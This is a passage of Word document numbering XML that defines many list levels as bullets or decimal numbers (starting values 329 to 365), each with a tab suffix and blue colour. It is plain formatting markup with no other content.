      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22044">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22045">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22046">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22047">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22048">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22049">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22050">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22051">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22052">
    <w:lvl>
      <w:start w:val="329"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22053">
    <w:lvl>
      <w:start w:val="330"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22054">
    <w:lvl>
      <w:start w:val="331"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22055">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22056">
    <w:lvl>
      <w:start w:val="332"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22057">
    <w:lvl>
      <w:start w:val="333"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22058">
    <w:lvl>
      <w:start w:val="334"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22059">
    <w:lvl>
      <w:start w:val="335"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22060">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22061">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22062">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22063">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22064">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22065">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22066">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22067">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22068">
    <w:lvl>
      <w:start w:val="336"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22069">
    <w:lvl>
      <w:start w:val="337"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22070">
    <w:lvl>
      <w:start w:val="338"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22071">
    <w:lvl>
      <w:start w:val="339"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22072">
    <w:lvl>
      <w:start w:val="340"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22073">
    <w:lvl>
      <w:start w:val="341"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22074">
    <w:lvl>
      <w:start w:val="342"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22075">
    <w:lvl>
      <w:start w:val="343"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22076">
    <w:lvl>
      <w:start w:val="344"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22077">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22078">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22079">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22080">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22081">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22082">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22083">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22084">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22085">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22086">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22087">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22088">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22089">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22090">
    <w:lvl>
      <w:start w:val="345"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22091">
    <w:lvl>
      <w:start w:val="346"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22092">
    <w:lvl>
      <w:start w:val="347"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22093">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22094">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22095">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22096">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22097">
    <w:lvl>
      <w:start w:val="348"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22098">
    <w:lvl>
      <w:start w:val="349"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22099">
    <w:lvl>
      <w:start w:val="350"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22100">
    <w:lvl>
      <w:start w:val="351"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22101">
    <w:lvl>
      <w:start w:val="352"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22102">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22103">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22104">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22105">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22106">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22107">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22108">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22109">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22110">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22111">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22112">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22113">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22114">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22115">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22116">
    <w:lvl>
      <w:start w:val="353"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22117">
    <w:lvl>
      <w:start w:val="354"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22118">
    <w:lvl>
      <w:start w:val="355"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22119">
    <w:lvl>
      <w:start w:val="356"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22120">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22121">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22122">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22123">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22124">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22125">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22126">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22127">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22128">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22129">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22130">
    <w:lvl>
      <w:start w:val="357"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22131">
    <w:lvl>
      <w:start w:val="358"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22132">
    <w:lvl>
      <w:start w:val="359"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22133">
    <w:lvl>
      <w:start w:val="360"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22134">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22135">
    <w:lvl>
      <w:start w:val="361"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22136">
    <w:lvl>
      <w:start w:val="362"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22137">
    <w:lvl>
      <w:start w:val="363"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22138">
    <w:lvl>
      <w:start w:val="364"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22139">
    <w:lvl>
      <w:start w:val="365"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22140">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22141">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22142">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22143">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22144">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22145">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22146">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22147">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
